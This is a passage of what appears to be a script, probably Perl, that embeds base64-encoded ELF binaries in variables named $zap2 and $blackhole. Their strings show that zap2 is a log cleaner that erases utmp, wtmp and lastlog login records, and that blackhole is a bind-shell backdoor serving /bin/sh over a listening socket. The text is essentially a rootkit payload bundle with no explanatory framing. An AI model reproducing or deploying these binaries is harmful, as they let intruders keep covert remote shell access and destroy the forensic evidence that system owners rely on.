+TElCQ18yLjAAdHh0X2NsZWFuAHJlbW92ZUBAR0xJQkNfMi4wAF9fZGVyZWdpc3Rlcl9mcmFtZV9p +bmZvQEBHTElCQ18yLjAAc3Rkb3V0QEBHTElCQ18yLjAAc3RkZXJyQEBHTElCQ18yLjAAX3N0YXJ0 +AGdldG9wdEBAR0xJQkNfMi4wAGxhc3Rsb2dfY2xlYW4AcmVwbGFzZQBzdHJsZW5AQEdMSUJDXzIu +MABjAHV0bXBfY2xlYW4AX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNf +Mi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAAX2ZpbmkAbHNlZWtAQEdMSUJDXzIuMABt +ZW1jcHlAQEdMSUJDXzIuMABfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4xLjMAb3BlbkBAR0xJQkNf +Mi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHduYW1AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAA +YXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABvcHRhcmdA +QEdMSUJDXzIuMABfSU9fc3RkaW5fdXNlZABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0 +AHJlYWRAQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBzdHJjcHlAQEdMSUJDXzIuMAA="; + +$zap2="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAcIQECDQAAABEDAAAAAAAADQAIAAHACgAGwAYAAYAAAA0 +AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQIowkAAKMJAAAFAAAAABAAAAEAAACkCQAApJkECKSZBAgoAQAAMAEA +AAYAAAAAEAAAAgAAALQJAAC0mQQItJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI +IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s +aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAAAMAAAAOAAAADQAAAAwA +AAALAAAAAAAAAAAAAAABAAAAAAAAAAAAAAADAAAABAAAAAUAAAAGAAAAAgAAAAkAAAAIAAAABwAA +AAoAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAB8AAAAEgAAAGcAAAAAAAAAcQAAABIAAABbAAAA +AAAAAB0AAAASAAAAKQAAAAAAAACsAAAAEgAAAEkAAAAAAAAA1QAAABIAAAALAAAAAAAAACkAAAAS +AAAAEgAAAAAAAAA8AAAAEgAAAGIAAAAAAAAAfAAAABIAAAAYAAAAAAAAADAAAAASAAAAMQAAAAAA +AAD/AAAAEgAAADoAAABgiQQIBAAAABEADgAkAAAAAAAAAHwAAAASAAAAbQAAAAAAAAAAAAAAIAAA +AABsaWJjLnNvLjYAcHJpbnRmAGxzZWVrAGJ6ZXJvAHdyaXRlAHJlYWQAc3RybmNtcABnZXRwd25h +bQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBzdHJsZW4Ab3BlbgBjbG9zZQBfX2dt +b25fc3RhcnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABAAEA +AAAQAAAAAAAAABBpaQ0AAAIAfAAAAAAAAADImgQIBg0AAJyaBAgHAQAAoJoECAcCAACkmgQIBwMA +AKiaBAgHBAAArJoECAcFAACwmgQIBwYAALSaBAgHBwAAuJoECAcIAAC8mgQIBwkAAMCaBAgHCgAA +xJoECAcMAABVieWD7Ajo8QAAAOhMAQAA6G8FAADJwwD/NZSaBAj/JZiaBAgAAAAA/yWcmgQIaAAA +AADp4P////8loJoECGgIAAAA6dD/////JaSaBAhoEAAAAOnA/////yWomgQIaBgAAADpsP////8l +rJoECGggAAAA6aD/////JbCaBAhoKAAAAOmQ/////yW0mgQIaDAAAADpgP////8luJoECGg4AAAA +6XD/////JbyaBAhoQAAAAOlg/////yXAmgQIaEgAAADpUP////8lxJoECGhQAAAA6UD///8x7V6J +4YPk8FBUUmjYiAQIaJCIBAhRVmgaiAQI6G/////0kJBVieVT6AAAAABbgcPzFQAAUIuDOAAAAIXA +dAL/0Itd/MnDkJBVieWD7AiAPcyaBAgAdSmhrJkECIsQhdJ0F4n2g8AEo6yZBAj/0qGsmQQIixCF +0nXrxgXMmgQIAcnDifZVieWD7AihjJoECIXAdBm4AAAAAIXAdBCD7AxojJoECOjnevv3g8QQycOQ +kFWJ5YHsiAEAAIPsCGoCaGSJBAjo+P7//4PEEKPQmgQIgz3QmgQIAA+IsgAAAIPsBGiAAQAAjYV4 +/v//UP810JoECOj5/v//g8QQhcB/Aut+g+wM/3UI6GX+//+DxBCJwo2FeP7//4PALIPsBFL/dQhQ +6Fr+//+DxBCFwHWwg+wIaIABAACNhXj+//9Q6I/+//+DxBCD7ARqAWiA/v///zXQmgQI6Ff+//+D +xBCD7ARogAEAAI2FeP7//1D/NdCaBAjo2v3//4PEEOlf////g+wM/zXQmgQI6NT9//+DxBDJw1WJ +5YHsmAEAAMeFdP7//wEAAACD7AhqAmhuiQQI6A3+//+DxBCj0JoECIM90JoECAAPiBMBAACDvXT+ +////dQXp9AAAAIPsBGoCi5V0/v//idDR4AHQweAH99hQ/zXQmgQI6Lj9//+DxBCD7ARogAEAAI2F +eP7//1D/NdCaBAjo2/3//4PEEIXAeQzHhXT+////////66CD7Az/dQjoPf3//4PEEInCjYV4/v// +g8Asg+wEUv91CFDoMv3//4PEEIXAdWiD7AhogAEAAI2FeP7//1DoZ/3//4PEEIPsBGoCi5V0/v// +idDR4AHQweAH99hQ/zXQmgQI6CL9//+DxBCD7ARogAEAAI2FeP7//1D/NdCaBAjopfz//4PEEMeF +dP7////////pC////42FdP7///8A6f7+//+D7Az/NdCaBAjoiPz//4PEEMnDVYnlgexIAQAAg+wM +/3UI6O/8//+DxBCJRfSDffQAD4SUAAAAg+wIagJofIkECOiw/P//g8QQo9CaBAiDPdCaBAgAD4iD +AAAAg+wEagCLRfSLUAiJ0MHgAwHQweADAdDB4AJQ/zXQmgQI6GX8//+DxBCD7AhoJAEAAI2FuP7/ +/1Dobvz//4PEEIPsBGgkAQAAjYW4/v//UP810JoECOjR+///g8QQg+wM/zXQmgQI6ND7//+DxBDr +E4PsCP91CGiNiQQI6Pv7//+DxBDJw1WJ5YPsCIPk8LgAAAAAKcSDfQgCdUuD7AyLRQyDwAT/MOgN +////g8QQg+wMi0UMg8AE/zDorv3//4PEEIPsDItFDIPABP8w6Lr8//+DxBCD7AxolIkECOia+/// +g8QQ6xCD7Axom4kECOiI+///g8QQycOQkJBVieVXVlOD7AzoAAAAAFuBw/IRAADo7vr//42TFP// +/42LFP///ynKMfbB+gI51nMPideQ/5SzFP///0Y5/nL0g8QMW15fycNVieVWU+gAAAAAW4HDrhEA +AI2LFP///42DFP///ynBwfkChcmNcf91C+g6AAAAW17Jw4n2/5SzFP///4nyToXSdfLr5VWJ5VNS +oXyaBAiD+P+7fJoECHQMg+sE/9CLA4P4/3X0WFvJw1WJ5VPoAAAAAFuBw0cRAABS6GL7//+LXfzJ +wwADAAAAAQACAC9ldGMvdXRtcAAvdXNyL2FkbS93dG1wAC91c3IvYWRtL2xhc3Rsb2cAJXM6ID8K +AFphcDIhCgBFcnJvci4KAAAAAAAAAAAAAIiaBAgAAAAAAQAAAAEAAAAMAAAAmIMECA0AAABAiQQI +BAAAAEiBBAgFAAAAdIIECAYAAACUgQQICgAAAIYAAAALAAAAEAAAABUAAAAAAAAAAwAAAJCaBAgC +AAAAWAAAABQAAAARAAAAFwAAAECDBAgRAAAAOIMECBIAAAAIAAAAEwAAAAgAAAD+//9vGIMECP// +/28BAAAA8P//b/qCBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAD/////AAAAAP////8AAAAAAAAAALSZBAgAAAAAAAAAAMaDBAjWgwQI5oMECPaDBAgGhAQI +FoQECCaEBAg2hAQIRoQECFaEBAhmhAQIAAAAAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA +R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH +Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD +QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRl +cnAALm5vdGUuQUJJLXRhZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUu +dmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0AC5pbml0AC50ZXh0AC5maW5pAC5yb2RhdGEALmRh +dGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmpjcgAuZ290AC5ic3MALmNvbW1l +bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAA +FIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAA +AAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAEwAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsA +AAACAAAAlIEECJQBAADgAAAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAAHSCBAh0AgAAhgAA +AAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAAD6ggQI+gIAABwAAAAEAAAAAAAAAAIAAAACAAAA +VAAAAP7//28CAAAAGIMECBgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAADiDBAg4 +AwAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAABAgwQIQAMAAFgAAAAEAAAACwAAAAQA +AAAIAAAAdQAAAAEAAAAGAAAAmIMECJgDAAAXAAAAAAAAAAAAAAAEAAAAAAAAAHAAAAABAAAABgAA +ALCDBAiwAwAAwAAAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAABwhAQIcAQAANAEAAAAAAAA +AAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAQIkECEAJAAAbAAAAAAAAAAAAAAAEAAAAAAAAAIcAAAAB +AAAAAgAAAFyJBAhcCQAARwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAMAAACkmQQIpAkAAAwA +AAAAAAAAAAAAAAQAAAAAAAAAlQAAAAEAAAACAAAAsJkECLAJAAAEAAAAAAAAAAAAAAAEAAAAAAAA +AJ8AAAAGAAAAAwAAALSZBAi0CQAAyAAAAAUAAAAAAAAABAAAAAgAAACoAAAAAQAAAAMAAAB8mgQI +fAoAAAgAAAAAAAAAAAAAAAQAAAAAAAAArwAAAAEAAAADAAAAhJoECIQKAAAIAAAAAAAAAAAAAAAE +AAAAAAAAALYAAAABAAAAAwAAAIyaBAiMCgAABAAAAAAAAAAAAAAABAAAAAAAAAC7AAAAAQAAAAMA +AACQmgQIkAoAADwAAAAAAAAAAAAAAAQAAAAEAAAAwAAAAAgAAAADAAAAzJoECMwKAAAIAAAAAAAA +AAAAAAAEAAAAAAAAAMUAAAABAAAAAAAAAAAAAADMCgAAqAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA +AwAAAAAAAAAAAAAAdAsAAM4AAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAHwQAAAg +BQAAGgAAACsAAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAACcFQAA9gIAAAAAAAAAAAAAAQAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAABSBBAgAAAAAAwABAAAAAAAogQQIAAAAAAMAAgAAAAAASIEE +CAAAAAADAAMAAAAAAJSBBAgAAAAAAwAEAAAAAAB0ggQIAAAAAAMABQAAAAAA+oIECAAAAAADAAYA +AAAAABiDBAgAAAAAAwAHAAAAAAA4gwQIAAAAAAMACAAAAAAAQIMECAAAAAADAAkAAAAAAJiDBAgA +AAAAAwAKAAAAAACwgwQIAAAAAAMACwAAAAAAcIQECAAAAAADAAwAAAAAAECJBAgAAAAAAwANAAAA +AABciQQIAAAAAAMADgAAAAAApJkECAAAAAADAA8AAAAAALCZBAgAAAAAAwAQAAAAAAC0mQQIAAAA +AAMAEQAAAAAAfJoECAAAAAADABIAAAAAAISaBAgAAAAAAwATAAAAAACMmgQIAAAAAAMAFAAAAAAA +kJoECAAAAAADABUAAAAAAMyaBAgAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwAAAAAAAAAAAAAAAAAD +ABgAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAMAGgABAAAAlIQECAAAAAACAAwAEQAAAAAA +AAAAAAAABADx/xwAAAB8mgQIAAAAAAEAEgAqAAAAhJoECAAAAAABABMAOAAAAIyaBAgAAAAAAQAU +AEUAAACsmQQIAAAAAAEADwBJAAAAzJoECAEAAAABABYAVQAAALiEBAgAAAAAAgAMAGsAAAD0hAQI +AAAAAAIADAARAAAAAAAAAAAAAAAEAPH/dwAAAICaBAgAAAAAAQASAIQAAACImgQIAAAAAAEAEwCR +AAAAsJkECAAAAAABABAAnwAAAIyaBAgAAAAAAQAUAKsAAAAciQQIAAAAAAIADADBAAAAAAAAAAAA +AAAEAPH/yAAAALSZBAgAAAAAEQARANEAAADQmgQIBAAAABEAFgDTAAAAAAAAAHwAAAASAAAA5AAA +AAAAAABxAAAAEgAAAPUAAABciQQIBAAAABEADgD8AAAApJkECAAAAAAQAvH/DQEAACCFBAjhAAAA +EgAMABcBAAComQQIAAAAABECDwAkAQAA2IgECEQAAAASAAwANAEAAJiDBAgAAAAAEgAKADoBAABw +hAQIAAAAABIADABBAQAAAAAAAB0AAAASAAAAUwEAAAAAAACsAAAAEgAAAGYBAACkmQQIAAAAABAC +8f95AQAAkIgECEgAAAASAAwAiQEAAMyaBAgAAAAAEADx/5UBAAAaiAQIcwAAABIADACaAQAAAAAA +ANUAAAASAAAAtwEAAKSZBAgAAAAAEALx/8gBAACkmQQIAAAAACAADwDTAQAAAAAAACkAAAASAAAA +5QEAAECJBAgAAAAAEgANAOsBAAAAAAAAPAAAABIAAAD8AQAApJkECAAAAAAQAvH/EAIAAAAAAAB8 +AAAAEgAAACACAAAAAAAAMAAAABIAAAAxAgAAAAAAAP8AAAASAAAARQIAAMyaBAgAAAAAEADx/0wC +AACQmgQIAAAAABEAFQBiAgAA1JoECAAAAAAQAPH/ZwIAAKSZBAgAAAAAEALx/3oCAABgiQQIBAAA +ABEADgCJAgAAAYYECEwBAAASAAwAkwIAAKSZBAgAAAAAEAAPAKACAAAAAAAAAAAAACAAAAC0AgAA +pJkECAAAAAAQAvH/ygIAAAAAAAB8AAAAEgAAANoCAABNhwQIzQAAABIADADnAgAAAAAAAAAAAAAg +AAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1Rf +XwBfX0pDUl9MSVNUX18AcC4wAGNvbXBsZXRlZC4xAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFt +ZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5E +X18AX19kb19nbG9iYWxfY3RvcnNfYXV4AHphcDIuYwBfRFlOQU1JQwBmAHdyaXRlQEBHTElCQ18y +LjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAX19maW5pX2FycmF5X2VuZABraWxsX3V0bXAAX19k +c29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfaW5pdABfc3RhcnQAc3RybGVuQEBHTElCQ18yLjAA +c3RybmNtcEBAR0xJQkNfMi4wAF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19i +c3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9l +bmQAZGF0YV9zdGFydABwcmludGZAQEdMSUJDXzIuMABfZmluaQBsc2Vla0BAR0xJQkNfMi4wAF9f +cHJlaW5pdF9hcnJheV9lbmQAb3BlbkBAR0xJQkNfMi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHdu +YW1AQEdMSUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2Fy +cmF5X3N0YXJ0AF9JT19zdGRpbl91c2VkAGtpbGxfd3RtcABfX2RhdGFfc3RhcnQAX0p2X1JlZ2lz +dGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAcmVhZEBAR0xJQkNfMi4wAGtpbGxfbGFz +dGxvZwBfX2dtb25fc3RhcnRfXwA="; + +$blackhole="f0VMRgEBAQkAAAAAAAAAAAIAAwABAAAARIYECDQAAACgDQAAAAAAADQAIAAGACgAGAAVAAYAAAA0 +AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBkAAAAZAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQIAAsAAAALAAAFAAAAABAAAAEAAAAACwAAAJsECACbBAgEAQAAIAEA +AAYAAAAAEAAAAgAAABALAAAQmwQIEJsECJgAAACYAAAABgAAAAQAAAAEAAAAEAEAABCBBAgQgQQI +GAAAABgAAAAEAAAABAAAAC91c3IvbGliZXhlYy9sZC1lbGYuc28uMQAAAAAIAAAABAAAAAEAAABG +cmVlQlNEAESCBwARAAAAHQAAAAAAAAAWAAAAFwAAABwAAAAaAAAAAAAAAA4AAAARAAAAFAAAABsA +AAAIAAAAEwAAAAEAAAAZAAAADAAAABUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA +AAUAAAACAAAAAAAAAAAAAAAHAAAAAAAAAAYAAAALAAAAAAAAAAoAAAAAAAAADQAAAAAAAAAQAAAA +AAAAAA8AAAASAAAAAAAAABgAAAADAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAESFBAgA +AAAAEgAAABIAAABUhQQILwAAABIAAAAZAAAAEJsECAAAAAARAPH/IgAAAGSFBAh9AAAAEgAAACgA +AAB0hQQIAAAAABIAAAAtAAAAhIUECAAAAAASAAAANAAAAJSFBAgAAAAAEgAAADoAAACkhQQIMAAA +ABIAAAA/AAAAKIUECAAAAAASAAcARQAAALSFBAgAAAAAEgAAAEwAAAAcnAQIBAAAABEAEgBUAAAA +xIUECAAAAAASAAAAWQAAAAAAAAAAAAAAIAAAAOkAAAAgnAQIAAAAABAA8f9xAAAAAJsECAQAAAAR +AAwAfAAAANSFBAhwAAAAEgAAAIMAAADkhQQIAAAAABIAAACKAAAA9IUECAAAAAASAAAA3AAAAASc +BAgAAAAAEADx/48AAADwiQQIAAAAABIACgCVAAAABIYECEwBAAASAAAA1QAAAAScBAgAAAAAEADx +/5wAAAC4mwQIAAAAABEA8f/oAAAAIJwECAAAAAAQAPH/lwAAABSGBAhbAAAAEgAAALIAAAAkhgQI +AAAAABIAAAC5AAAAAAAAAAAAAAAgAAAAzwAAADSGBAgAAAAAEgAAAABsaWJjLnNvLjQAc3RyY3B5 +AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABiemVybwBzZW5kAF9pbml0AGFjY2Vw +dABlbnZpcm9uAGJpbmQAX19kZXJlZ2lzdGVyX2ZyYW1lX2luZm8AX19wcm9nbmFtZQBzaWduYWwA +bGlzdGVuAGZvcmsAX2ZpbmkAYXRleGl0AF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBzdHJsZW4AX19y +ZWdpc3Rlcl9mcmFtZV9pbmZvAGNsb3NlAF9lZGF0YQBfX2Jzc19zdGFydABfZW5kAAAAAMSbBAgH +AQAAyJsECAcCAADMmwQIBwQAANCbBAgHBQAA1JsECAcGAADYmwQIBwcAANybBAgHCAAA4JsECAcK +AADkmwQIBwwAAOibBAgHEAAA7JsECAcRAADwmwQIBxIAAPSbBAgHFQAA+JsECAcZAAD8mwQIBxoA +AACcBAgHHAAA6AsCAADojgQAAMMA/zW8mwQI/yXAmwQIAAAAAP8lxJsECGgAAAAA6eD/////Jcib +BAhoCAAAAOnQ/////yXMmwQIaBAAAADpwP////8l0JsECGgYAAAA6bD/////JdSbBAhoIAAAAOmg +/////yXYmwQIaCgAAADpkP////8l3JsECGgwAAAA6YD/////JeCbBAhoOAAAAOlw/////yXkmwQI +aEAAAADpYP////8l6JsECGhIAAAA6VD/////JeybBAhoUAAAAOlA/////yXwmwQIaFgAAADpMP// +//8l9JsECGhgAAAA6SD/////JfibBAhoaAAAAOkQ/////yX8mwQIaHAAAADpAP////8lAJwECGh4 +AAAA6fD+//9VieWD7AxXVlOJ0o11CIte/I18ngSJPRycBAiF234pg30IAHQji0UIowCbBAiAOAB0 +Fon2gDgvdQmNSAGJDQCbBAhAgDgAdey4EJsECIXAdAyDxPRS6Gb///+DxBCDxPRo8IkECOhW//// +6HX+//+D5PCD7BiJXCQAiXQkBIl8JAjomgAAAIlEJADoQf///41l6FteX8nDkFWJ5YPsCIM9CJsE +CAB1QOsUjXYAgwUEmwQIBKEEmwQIi0D8/9ChBJsECIM4AHXluAAAAACFwHQNg8T0aAybBAjo33j7 +98cFCJsECAEAAADJw412AFWJ5YPsCMnDVYnlg+wIuAAAAACFwHQSg8T4aAScBAhoDJsECOinePv3 +ycOQVYnlg+wIycNVieWD7EjHRfwgigQIx0X4QIoECMdF9ICKBAjGRdkCuNsaAACG4GaJRdrHRdwA +AAAAg8T4agiNRdiNUAhS6O79//+DxBCDxPhoq4oECItFDIsQUuiI/f//g8QQg8T4agFqFOgJ/v// +g8QQg8T8agBqAWoC6Kj9//+DxBCJwIlF8IN98AB9HoPE9IPE9GiyigQI6Fr9//+DxBCJwFDoD/7/ +/4PEEIPE/GoQjUXYUItF8FDoqv3//4PEEInAhcB9IYPE9IPE9GjAigQI6CH9//+DxBCJwFDo1v3/ +/4PEEI12AIPE+GoFi0XwUOiS/f//g8QQicCFwH0hg8T0g8T0aMyKBAjo6fz//4PEEInAUOie/f// +g8QQjXYAx0XoEAAAAJCDxPyNRehQjUXIUItF8FDoHP3//4PEEInAiUXsg33sAH0eg8T0g8T0aNqK +BAjonvz//4PEEInAUOhT/f//g8QQ6Cv9//+JwIXAD4TVAAAAagCDxPSLRfxQ6EP9//+DxBCJwFCL +RfxQi0XsUOiw/P//g8QQagCDxPSLRfhQ6B/9//+DxBCJwFCLRfhQi0XsUOiM/P//g8QQagCDxPSL +RfRQ6Pv8//+DxBCJwFCLRfRQi0XsUOho/P//g8QQg8T4agCLRexQ6Cf8//+DxBCDxPhqAYtF7FDo +Fvz//4PEEIPE+GoCi0XsUOgF/P//g8QQg8T8agBo54oECGjnigQI6N77//+DxBCDxPSLRexQ6J/8 +//+DxBCDxPRqAOhy/P//g8QQjXYAg8T0i0XsUOiA/P//g8QQ6cj+///Jw4n2VYnlg+wUU7uomwQI +gz2omwQI/3QPjXYAiwP/0IPD/IM7/3X0W8nDkFWJ5YPsCMnD6Of8///DAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkNvbm5lY3RlZCEKCgAAAAAAAAAAAAAAAAAAAAAA +AABUaGlzIGZpbmUgdG9vbCBjb2RlZCBieSBCcm9uYyBCdXN0ZXIKAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAUGxlYXNlIGVudGVyIGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAGFwYWNo +ZQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJvcgoAQWNjZXB0IGVycm9yAC9i +aW4vc2gAAAAAAAAAAAAAAAAAAAAAAAAAigQItJsECAAAAAAAAAAAAQAAAAEAAAAMAAAAKIUECA0A +AADwiQQIBAAAACiBBAgFAAAAuIMECAYAAADogQQICgAAAO0AAAALAAAAEAAAABUAAAAAAAAAAwAA +ALibBAgCAAAAgAAAABQAAAARAAAAFwAAAKiEBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAEJsECAAAAAAAAAAASoUECFqFBAhq +hQQIeoUECIqFBAiahQQIqoUECLqFBAjKhQQI2oUECOqFBAj6hQQICoYECBqGBAgqhgQIOoYECABH +Q0M6IChHTlUpIGMgMi45NS40IDIwMDIwMzIwIFtGcmVlQlNEXQAAR0NDOiAoR05VKSBjIDIuOTUu +NCAyMDAyMDMyMCBbRnJlZUJTRF0AAEdDQzogKEdOVSkgYyAyLjk1LjQgMjAwMjAzMjAgW0ZyZWVC +U0RdAABHQ0M6IChHTlUpIGMgMi45NS40IDIwMDIwMzIwIFtGcmVlQlNEXQAIAAAAAAAAAAEAAAAw +MS4wMQAAAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEA +AAAwMS4wMQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRh +ZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0 +YQAuZGF0YQAuZWhfZnJhbWUALmR5bmFtaWMALmN0b3JzAC5kdG9ycwAuZ290AC5ic3MALmNvbW1l +bnQALm5vdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEA +AAACAAAA9IAECPQAAAAZAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAABCBBAgQAQAAGAAA +AAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAAAogQQIKAEAAMAAAAAEAAAAAAAAAAQAAAAEAAAA +NwAAAAsAAAACAAAA6IEECOgBAADQAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAALiDBAi4 +AwAA7QAAAAAAAAAAAAAAAQAAAAAAAABHAAAACQAAAAIAAACohAQIqAQAAIAAAAAEAAAACAAAAAQA +AAAIAAAAUAAAAAEAAAAGAAAAKIUECCgFAAALAAAAAAAAAAAAAAAEAAAAAAAAAEsAAAABAAAABgAA +ADSFBAg0BQAAEAEAAAAAAAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAABEhgQIRAYAAKwDAAAAAAAA +AAAAAAQAAAAAAAAAXAAAAAEAAAAGAAAA8IkECPAJAAAGAAAAAAAAAAAAAAAEAAAAAAAAAGIAAAAB +AAAAAgAAAACKBAgACgAAAAEAAAAAAAAAAAAAIAAAAAAAAABqAAAAAQAAAAMAAAAAmwQIAAsAAAwA +AAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEAAAADAAAADJsECAwLAAAEAAAAAAAAAAAAAAAEAAAAAAAA +AHoAAAAGAAAAAwAAABCbBAgQCwAAmAAAAAUAAAAAAAAABAAAAAgAAACDAAAAAQAAAAMAAAComwQI +qAsAAAgAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAEAAAADAAAAsJsECLALAAAIAAAAAAAAAAAAAAAE +AAAAAAAAAJEAAAABAAAAAwAAALibBAi4CwAATAAAAAAAAAAAAAAABAAAAAQAAACWAAAACAAAAAMA +AAAEnAQIBAwAABwAAAAAAAAAAAAAAAQAAAAAAAAAmwAAAAEAAAAAAAAAAAAAAAQMAACgAAAAAAAA +AAAAAAABAAAAAAAAAKQAAAAHAAAAAAAAAAAAAACkDAAAUAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA +AwAAAAAAAAAAAAAA9AwAAKoAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAGARAADQ +BAAAFwAAAC8AAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAAAwFgAA9gEAAAAAAAAAAAAAAQAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPSABAgAAAAAAwABAAAAAAAQgQQIAAAAAAMAAgAAAAAAKIEE +CAAAAAADAAMAAAAAAOiBBAgAAAAAAwAEAAAAAAC4gwQIAAAAAAMABQAAAAAAqIQECAAAAAADAAYA +AAAAACiFBAgAAAAAAwAHAAAAAAA0hQQIAAAAAAMACAAAAAAARIYECAAAAAADAAkAAAAAAPCJBAgA +AAAAAwAKAAAAAAAAigQIAAAAAAMACwAAAAAAAJsECAAAAAADAAwAAAAAAAybBAgAAAAAAwANAAAA +AAAQmwQIAAAAAAMADgAAAAAAqJsECAAAAAADAA8AAAAAALCbBAgAAAAAAwAQAAAAAAC4mwQIAAAA +AAMAEQAAAAAABJwECAAAAAADABIAAAAAAAAAAAAAAAAAAwATAAAAAAAAAAAAAAAAAAMAFAAAAAAA +AAAAAAAAAAADABUAAAAAAAAAAAAAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwABAAAAAAAAAAAAAAAE +APH/DAAAANyGBAgAAAAAAAAJABsAAAAEmwQIAAAAAAEADAAfAAAAsJsECAAAAAABABAALQAAAAib +BAgAAAAAAQAMADkAAADchgQIAAAAAAIACQBPAAAADJsECAAAAAABAA0AYgAAADCHBAgAAAAAAgAJ 